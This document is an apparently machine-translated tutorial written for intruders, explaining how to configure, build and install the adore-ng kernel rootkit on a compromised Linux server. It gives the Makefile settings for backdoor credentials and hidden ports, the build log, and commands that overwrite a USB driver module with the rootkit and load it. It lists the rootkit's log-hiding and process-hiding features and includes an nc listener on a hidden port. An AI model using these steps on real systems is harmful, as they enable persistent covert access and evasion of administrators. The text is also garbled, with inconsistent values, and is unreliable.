Linux latest kernel-level backdoor adore-ng Usage Details

Adore-ng is a kernel-level backdoor in linux, and adore-ng is an excellent LKMrootkit. adore-ng is currently 0.54 in the latest version and can be used in the 2.4-2.6 kernel, and the stability is very good. Next we will demonstrate its powerful functions step by step. log on to the target machine as the root user and download adore-ng to the local device.

Adore-ng is a kernel-level backdoor in linux, and adore-ng is an excellent LKM rootkit. adore-ng is currently 0.54 in the latest version and can be used in the 2.4-2.6 kernel, and the stability is very good. Next we will demonstrate its powerful functions step by step. log on to the target machine as the root user and download adore-ng to the local device .....

A technology used to facilitate next entry after intruders fully control the system.

You can modify the system configuration file and install a third-party backdoor tool. It is concealed and can bypass system logs and is not easily discovered by system administrators.

It is really not easy to find a good linux backdoor. I just collected this article for you. For more information, see www.linuxso.com.

Preface:
Kernel 2.6 has stride into the linux World, and backdoor writing and webshell writing must also keep up with the trend.

Shorthand Convention:
Fc: fEdOra core
Rh: red hat
Rhel4: red hat enterprise linux 4
Sk:SuCkit
Adore: adore-ng
Rk: rootkit
Lkm: loadable kernel moDuLes

What is adore-ng?
Google adore will provide a lot of details about an LKM rk.

Why choose him?
1. I didn't get sk for 2.6
2. kmem is disabled by default for rh kernel after fc2, sk cannot inject the kernel on the fly, and many programs that check rk also fail :)
3. adore is written by Daniel Stealth and has a long history. There are more than N people to help him test. It should be more stable than other LKM, and the stability of LKM will seriously affect the system stability, therefore, we must be cautious when selecting a model. Even if the function is good, the system will be suspended after a bit of play and the system will be discovered by others.

Function:
[Root @ RHEL4 adore-ng] #CatFEATURES

If you never uSedAdore before, here's a list of supported
Things:

O runs on kernel 2.4.x UP and SMP systems
O runs on kernel 2.6.x UP and SMP systems, i386 and x86_64 archs tested
OFileAnd directory hIdIng
O process hiding
O socket-hiding (no matter whether LISTENing, CONNECTED etc)
O full-capability back door
O does not utilize sys_call_table but VFS layer
O KISS priNcIple, to haveLessThings in there as possible
ButLsO being as much powerful as possible
O hides itself from/proc and/sys filesystems

O syslog filtering: logs generated by hiDdEn processes never appear
On the syslog UNIX socket anyMore
O wtmp/utmp/lastlog filtering: writing of xtmp enTrIes by hidden processes
Do not appear in the file,ExCept you force it by using special hidden
AND authenticated process (a sshd back door is usually only hidden thus
Xtmp entries written by sshd don't make it to disk)
O (optional) relinking of LKMs as described in phrack #61 aka LKM infection
To make it possible to be automatically reloaded after reboots (2.4 and 2.6)
Environment:
Real machine non-Virtual Machine
[Root @ RHEL4 adore-ng] #Uname-A; cat/etc/redhat-release
Linux RHEL4 2.6.9-5.EL #1 Wed Jan 5 19:22:18 EST 2005 i686 athlon i386 GNU/linux
Red Hat Enterprise linux AS release 4 (Nahant)

Download:
Google adore-ng
Or you can look for it in the http://baoz.net of the website.

Edit and compile:
[Root @ RHEL4 adore-ng] #MvMakefile.2.6 Makefile

Edit the following content.
EXTRA_CFLAGS =-DELITE_UID = 2618748389U-DELITE_GID = 4063569279U
EXTRA_CFLAGS + =-DCURRENT_ADORE = 54
EXTRA_CFLAGS + =-DADORE_KEY = "fgjgggfd"

This is a hidden TCP port. Do not change the last 0.
U_short HIDDEN_SERVICES [] =
{2222,735 0, 0 };
If you are an SMP machine, open the following.
EXTRA_CFLAGS + =-d1_smp __

Set the location of your kernel code
KERNEL_SOURCE =/usr/src/linux

OK, save and exit, make

[Root @ RHEL4 adore-ng] # make
Cc-DELITE_UID = 2634745389u-DELITE_GID = 6063589279U-DCURRENT_ADORE = 54-DADORE_KEY = "djksDfNvn "-DHIDE ava. c libinvisible. c-o ava
Ava. c: 47: warning: integer constant is too large for "unsigned long" type
Ava. c: 47: warning: large integer implicitly truncated to unsigned type
Libinvisible. c: In function 'adore _ hidefile ':
Libinvisible. c: 76: warning: integer constant is too large for "unsigned long" type
Libinvisible. c: 76: warning: large integer implicitly truncated to unsigned type
Make-C/usr/src/linux SUBDIRS ='Pwd'Modules'
Make [1]: Entering directory '/usr/src/kernels/2.6.9-5. EL-i686 ′
CC [M]/root/adore-ng/adore-ng-2.6.o
/Root/adore-ng/adore-ng-2.6.c: 56: warning: 'module _ PARM _ 'is deprecated (declared at include/linux/MODULE. h: 552)
/Root/adore-ng/adore-ng-2.6.c: 59: warning: 'module _ PARM _ 'is deprecated (declared at include/linux/MODULE. h: 552)
/Root/adore-ng/adore-ng-2.6.c: 61: warning: 'module _ PARM _ 'is deprecated (declared at include/linux/MODULE. h: 552)
/Root/adore-ng/adore-ng-2.6.c: In function 'adore _ opt_filldir ':
/Root/adore-ng/adore-ng-2.6.c: 281: warning: integer constant is too large for "unsigned long" type
/Root/adore-ng/adore-ng-2.6.c: 281: warning: comparison is always false due to limited range of data type
/Root/adore-ng/adore-ng-2.6.c: In function 'adore _ root_filldir ':
/Root/adore-ng/adore-ng-2.6.c: 363: warning: integer constant is too large for "unsigned long" type
/Root/adore-ng/adore-ng-2.6.c: 363: warning: comparison is always false due to limited range of data type
Building modules, stage 2.
MODPOST
CC/root/adore-ng/adore-ng-2.6.mod.o
LD [M]/root/adore-ng/adore-ng-2.6.ko
Make [1]: Leaving directory '/usr/src/kernels/2.6.9-5. EL-i686 ′
Cc-O2 symsed. c-o symsed

Let's talk about his relink, which is the function of inserting adore into other modules. Let's see what he has done.
System ("Cp$ Lkm_path t. ko ");
System ("./symsed t. ko zero; ld-r adore-ng-2.6.ko t. ko-o z. ko;Rm-F t. ko ");
Print "nCopy trojaned LKM back to original LKM? (Y/n) n ";

While ($ yn !~ /^ (Y | n) $/I ){
$ Yn = ;
$ Yn = ~ S/n //;
}

If ($ yn = ~ /Y/I ){
System ("cp z. ko $ lkm_path ");
} Else {
Print "nOutput LKM is z. kon ";
}
After I insert a module in RHEL4, the module cannot be started, but it doesn't matter. We don't insert it, we replace it :)
Only a few people have installed the system.Modprobe-R, so we can easily replace some modules that are not required by the system. Let's look at my modules.
[Root @ RHEL4 adore-ng] #Lsmod
Module Size Used
Dm_mod 54741 0
Ohci_hCd21713 0
Snd_intel8 &TimeS; 0 33769 0
Snd_ac97_codec 63889 1 snd_intel8 × 0
Snd_pcm_oss 49017 0
Snd_mixer_oss 17985 1 snd_pcm_oss
Snd_pcm 96841 2 snd_intel8 × 0, snd_pcm_oss
Snd_timer 29893 1 snd_pcm
Snd_page_alloc 9673 2 snd_intel8 × 0, snd_pcm
Snd_mpu401_uart 8769 1 snd_intel8 x 0
Snd_rawmidi 26597 1 snd_mpu401_uart
Snd_seq_device 8137 1 snd_rawmidi
Snd 54949 9

Snd_intel8 × 0, snd_ac97_codec, snd_pcm_oss, snd_mixer_oss, snd_pcm, snd_timer, snd_mpu401_uart, snd_rawmidi, snd_seq_device
Soundcore 9889 1 snd
Sis90018756 0
Ext3 116809 1
Jbd 71257 1 ext3

We chose a module with Used By 0 which is not very useful, such as a usb driver.
I have used ehci_hcd, so I cannot see it here. We can also use ohci_hcd or the sound card module.

See where he is.
[Root @ RHEL4 adore-ng] # modprobe-l |GrepEhci
/Lib/modules/2.6.9-5.EL/ kernel/drivers/usb/host/ehci-hcd.ko

Unload him
[Root @ RHEL4 adore-ng] # modprobe-r ehci-hcd
Replace him
[Root @ RHEL4 adore-ng] # cp adore-ng-2.6.ko/lib/modules/2.6.9-5.EL/ kernel/drivers/usb/host/ehci-hcd.ko
Load him
[Root @ RHEL4 adore-ng] # modprobe ehci-hcd
Check him
[Root @ RHEL4 adore-ng] #./ava I
Checking for adore 0.12 or higher...
Adore 1.54 installed. Good luck.

ELITE_UID: 2648745389, ELITE_GID = 1768621983, ADORE_KEY = djksdfnvn CURRENT_ADORE = 54

Leakage:
If the other side uses tripwire (RHEL4 installed by default), then the replacement of the ehci-hcd.ko is very easy to expose, but there is no way, even if the relink module will be exposed, huh, huh

Question:
1. Hidden ports (adore-ng.h) go decimal, I. e. '000000' hides everythingWhichBelongs to port
2222.
In this case, I understand that the processes related to port 2222 are hidden at the same time. Oh, maybe I have wrong understanding of his everything :)
[Root @ RHEL4 ~] # Nc-vvnlp 2222
Listening on [any] 2222...

[Root @ RHEL4 adore-ng] # ps aux | grep 2222
Root 1938 0.0 0.1 1724 496 pts/1 S + nc-vvnlp 2222
Root 1941 0.0 0.1 5304 684 pts/0 S + grep 2222
2. [root @ RHEL4 adore-ng] # grep full-capability FEATURES
O full-capability back door
This is a bit confusing. This backdoor is clearly a localroot. I personally think localroot is not called backdoor.
[Root @ RHEL4 adore-ng] #./ava | grep root
R exeCutE as root